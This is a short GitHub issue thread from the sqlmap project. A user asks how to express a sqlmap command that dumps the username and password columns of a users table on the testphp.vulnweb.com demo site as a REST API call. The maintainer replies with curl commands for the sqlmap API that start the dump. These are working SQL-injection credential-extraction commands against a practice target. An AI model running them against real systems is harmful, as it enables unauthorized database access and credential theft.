### ISSUE TITLE
GET Help!!! SQLMAP Api How to dump the the username and password

### ISSUE THREAD

**Issue by ycozzz** [sqlmapproject/sqlmap#4931]
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=3 -D acuart -T users -C uname,pass --dump
tranfer to this API format 
r = requests.post(self.__ip + '/scan/' + self.taskid + '/start',data=json.dumps({'url':url,'XXXXX}), headers=self.format)

I can't to dump the datebase username and password of the SQLMAP API. Please help to tranfer format.

**Comment by stamparm** [comment]
```
taskid=$(curl http://127.0.0.1:8775/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}')
curl -H "Content-Type: application/json" -X POST -d '{"tbl": "users", "col": "uname,pass", "dumpTable": true, "db": "acuart", "url": "http://testphp.vulnweb.com/artists.php?artist=1"}' http://127.0.0.1:8775/scan/$taskid/start
```
